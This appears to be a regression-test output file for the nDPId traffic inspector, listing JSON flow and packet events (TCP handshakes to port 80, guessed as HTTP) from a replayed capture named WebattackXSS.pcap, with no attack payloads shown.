-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1499347191300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347191300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a9VAAD4GWgOsEAABwKgKMtUmAFBoHamZoviBF4AQAOWYgwAAAQEICgE5wkwD45PC"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347192547,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347192547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NKNAAD4GkS2sEAABwKgKMtU0AFBlD\/cgAAAAAKACchBokgAAAgQFtAQCCAoBOcODAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347192547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1TRgTBA1ZQ\/3IaAScSBgEgAAAgQFtAQCCAoD45T6ATnDgwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NKRAAD4GkTSsEAABwKgKMtU0AFBlD\/chYEwQNoAQAOX\/GAAAAQEICgE5w4QD45T6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347195099,"flow_last_seen":1499347195099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347195099,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1499347195099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347195099,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oYJAAD4GJE6sEAABwKgKMtVOAFAI3GeAAAAAAKACchBRzQAAAgQFtAQCCAoBOcYCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1499347195099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347195099,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1U4LxrqfCNxngaAScSDw6gAAAgQFtAQCCAoD45d4ATnGAgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1499347195100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347195100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oYNAAD4GJFWsEAABwKgKMtVOAFAI3GeBC8a6oIAQAOWP8gAAAQEICgE5xgID45d4"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347196341,"flow_last_seen":1499347196341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347196341,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1499347196341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347196341,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LeJAAD4Gl+6sEAABwKgKMtVcAFCW1uraAAAAAKACchA\/NAAAAgQFtAQCCAoBOcc4AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1910,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1499347196341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347196341,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Vx\/2Nugltbq26AScSBICAAAAgQFtAQCCAoD45iuATnHOAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1499347196342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347196342,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LeNAAD4Gl\/WsEAABwKgKMtVcAFCW1urbf9jboYAQAOXnDwAAAQEICgE5xzgD45iu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347197627,"flow_last_seen":1499347197627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347197627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1499347197627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347197627,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jKtAAD4GOSWsEAABwKgKMtVqAFDoUUTRAAAAAKACchCScgAAAgQFtAQCCAoBOch6AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1923,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1499347197628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347197628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1WoUz7Ep6FFE0qAScSAvhQAAAgQFtAQCCAoD45nwATnIegEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1499347197628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347197628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jKxAAD4GOSysEAABwKgKMtVqAFDoUUTSFM+xKoAQAOXOjAAAAQEICgE5yHoD45nw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347200170,"flow_last_seen":1499347200170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347200170,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1499347200170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347200170,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8egdAAD4GS8msEAABwKgKMtWEAFAb8rDyAAAAAKACchDwGwAAAgQFtAQCCAoBOcr1AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1499347200171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347200171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1YQCBmJ3G\/Kw86AScSDsLQAAAgQFtAQCCAoD45xsATnK9QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1499347200171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347200171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eghAAD4GS9CsEAABwKgKMtWEAFAb8rDzAgZieIAQAOWLNAAAAQEICgE5yvYD45xs"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347201471,"flow_last_seen":1499347201471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1499347201471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347201471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JERAAD4GoYysEAABwKgKMtWSAFCOe+h\/AAAAAKACchBEsQAAAgQFtAQCCAoBOcw7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1499347201471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347201471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ZJxUzmIjnvogKAScSD5HwAAAgQFtAQCCAoD452xATnMOwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1499347201472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347201472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JEVAAD4GoZOsEAABwKgKMtWSAFCOe+iAcVM5iYAQAOWYJwAAAQEICgE5zDsD452x"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 